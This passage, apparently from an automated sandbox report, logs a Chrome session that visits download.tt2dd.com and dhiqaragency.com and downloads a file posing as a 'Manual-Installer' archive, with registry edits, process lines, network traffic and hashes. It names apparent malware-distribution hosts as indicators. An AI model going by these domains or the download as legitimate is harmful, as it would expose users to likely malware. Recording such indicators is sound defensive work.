| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4124900551-4068476067-3491212533-1000\{F9A0DDAB-CE72-4113-BFF1-02B225EA690F} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://download.tt2dd.com/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa5db7ab58,0x7ffa5db7ab68,0x7ffa5db7ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1668 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2224 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2220 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3052 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4284 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4316 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1548 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=1612 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4584 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5116 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4772 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5612 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5608 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5136 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5732 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=6108 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5680 --field-trial-handle=1876,i,15836590191731067338,1221818747747315440,131072 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | download.tt2dd.com | udp |
| US | 108.178.44.242:443 | download.tt2dd.com | tcp |
| US | 108.178.44.242:443 | download.tt2dd.com | udp |
| US | 8.8.8.8:53 | 242.44.178.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.178.89.13.in-addr.arpa | udp |
| US | 108.178.44.242:443 | download.tt2dd.com | udp |
| US | 8.8.8.8:53 | dhiqaragency.com | udp |
| US | 172.67.215.245:443 | dhiqaragency.com | tcp |
| US | 8.8.8.8:53 | 245.215.67.172.in-addr.arpa | udp |
| US | 172.67.215.245:443 | dhiqaragency.com | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 172.217.169.42:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 42.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| GB | 172.217.16.238:443 | translate.google.com | tcp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| GB | 142.250.200.42:443 | translate-pa.googleapis.com | udp |
| GB | 172.217.16.238:443 | translate.google.com | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | 22.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| GB | 172.217.16.226:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.179.230:443 | static.doubleclick.net | tcp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| GB | 142.250.187.225:443 | yt3.ggpht.com | tcp |
| GB | 172.217.16.226:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.187.225:443 | yt3.ggpht.com | tcp |
| US | 8.8.8.8:53 | 226.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| GB | 163.70.151.21:443 | connect.facebook.net | tcp |
| GB | 163.70.151.21:443 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 225.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | scontent.xx.fbcdn.net | udp |
| GB | 163.70.151.21:443 | scontent.xx.fbcdn.net | udp |
| GB | 163.70.151.35:443 | www.facebook.com | udp |
| US | 172.67.215.245:80 | dhiqaragency.com | tcp |
| US | 172.67.215.245:80 | dhiqaragency.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.187.206:443 | play.google.com | udp |
| GB | 142.250.187.206:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
Files
\??\pipe\crashpad_2980_DQKNCXILDTEXDAIF
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 5b4c6c4ded12f1059015b528c826ea90 |
| SHA1 | 3c59e7a9d56148797211010d94d4ef8ec6117eb5 |
| SHA256 | a1b793bc2acabab06bedff3935536756ee3fa1eb5feb939992afd4318e006758 |
| SHA512 | 3fe8751f870ec0b1258a1f325d92fd12b508255ec403a55b243853d8822de033fa818eea51678430abe65f3e53cc76765e16a7f5cd3feed79e731081cf724ba9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b1383c05c0eb90fb8c5dd0d0ed7c4813 |
| SHA1 | b939c88be68fe2eb2530d73d602372adfb6c1ca0 |
| SHA256 | 9656fe07905312709c81a1bb0103defc57ce015333166308e512e102c64ee90b |
| SHA512 | 900fcc3104313708ea0181a28029aab7408452b9ae413da96e210bae0a4fdafe0e3669af8d796351817aa86ee4e4d98e4cbf25d0e756b6cb28c83ffffb063815 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | b0368e04454b90b088cf13ad8dfd98f4 |
| SHA1 | bef778ff139a5bd3498def825b3329c3b054a52f |
| SHA256 | ea3f68cbc0ab5b0488c2a184830f96cda2f787ddc6c3799a8d181e2dcd84db0e |
| SHA512 | 200a0518a25c07b2245fd0dd5f113f060fc2f6978567e2fc480864c7540e03429481b2a95e932819974100849c578d8eadbeaf51af8f78b39960d25b8efeab6f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 7fe2ca073e4d91308396ac13892cdcea |
| SHA1 | af2cfefffaee2dd9252f0991f45d0b90ab32a48f |
| SHA256 | 31590d9c7f3f21ae804e952b04d99141aeed24e87b2f1426b0d71d4dafcdbd72 |
| SHA512 | e34150a0bf02b995bb06b540cc127f344aa438a224bb142ace28006661ee9a69e19f8d1eeda508642d1b6cfac26457495fdad63bc7a8dab5fc69c72e022bcc58 |
C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar.gz.crdownload
| MD5 | 712e95f9d0c5c7359aeaab697e099f9e |
| SHA1 | 9ff66a4d79e060d764093b70fe68949b62edf439 |
| SHA256 | d954514846c34e32e4cc7a29b840e4842a9dc7146c7daeb8ed454e301f52f7bf |
| SHA512 | 7582f4d0a001df350a0ae4da5e189388017c63345dc06e3c2656baa3e931688b4e8c0c127b107730f71dc3723e10ebf67fd1de17edac6fd29f15f23fed296b9f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 8d073dbb6d79f47faa95750b9576441b |
| SHA1 | 6b7935095cc67c8fcb5170d4b49591b07ab88768 |
| SHA256 | 74bcc5e354105fc0381dadb2aa6f2c63498150f9ddd7163023ec55210e3ac5cb |
| SHA512 | 21dd0d81c35514b694c8723291be25c21adaa0cabb19c6d8fe9cd9549d3e57a00d8a1f3849f99abe836fd5abfe6783b61e49b70f1cca4bb1ea41aecfc204c7cd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 4264b58ce470cb841b6a5d8520d62193 |
| SHA1 | 67bafceee127ffae254fc09d8d756df6ee2f95ad |
| SHA256 | 567c8db0ad4d69bdf423e2badc059a34b8a16d4de8b5a21c758488ba2367f57a |
| SHA512 | 47ddeb12079e938067233cd88a43d266278f937caab57edaa7e1bffbf7d9d36aba9f9d8a2c8b606b8585a336a2227ad5d93da122dac2fd8d4555cd9e42c47cc0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 91a5ec168882fbe5790563a7099cae78 |
| SHA1 | 6d67eab4ca0ebcff0573771caa331b034e2dfac5 |
| SHA256 | 8cb2a5267f4a16f272adf57b74235d2bea37a93d8dda011111d722a1684b22e1 |
| SHA512 | 8eae5053fcd0970daec1a6a8d3d4dcba25788728f0ee8b611368ac4d5b9f327a08394dc1ba1d4c4b820f192be7a658cb7de3467b5b424a05b8cdff7437ff53bf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | bf82c9ba8725df400c2fec0dfdeab68c |
| SHA1 | 48705805d13349668cbe359a02722b07b28bd5cf |
| SHA256 | 8e435c67a507e46095a7e0ca4f533f4dfbb9e8b8d9f0bb7149a08dbdbe2a28df |
| SHA512 | aa99425c43be28bc41b58836f38881921cfb6e8dc9d6eb9d226b92809c2a47b422ed30004bad24815f9843598de23a7d7baca3eff45ff3af6769f850e64e1384 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5a326b.TMP
| MD5 | cb26dfcf2b8a53b7a318f03b0b5a2e80 |
| SHA1 | e3e15496a2b28f06279687342f40a5b11c6e1f69 |
| SHA256 | 552610507f02684937542d90fa0eb916f301860a7fbfa74f3104a84e6c778e65 |
| SHA512 | a4bd138051571c2050443977383e72ede63344169dee96bb6daf970877195e6ffbbac4a1d17cddab4ddc5b751be9cf0d5c8a3dc48da84429691b2dff15ed3103 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | e3c8c1891b4d4099db8167877f0ba99b |
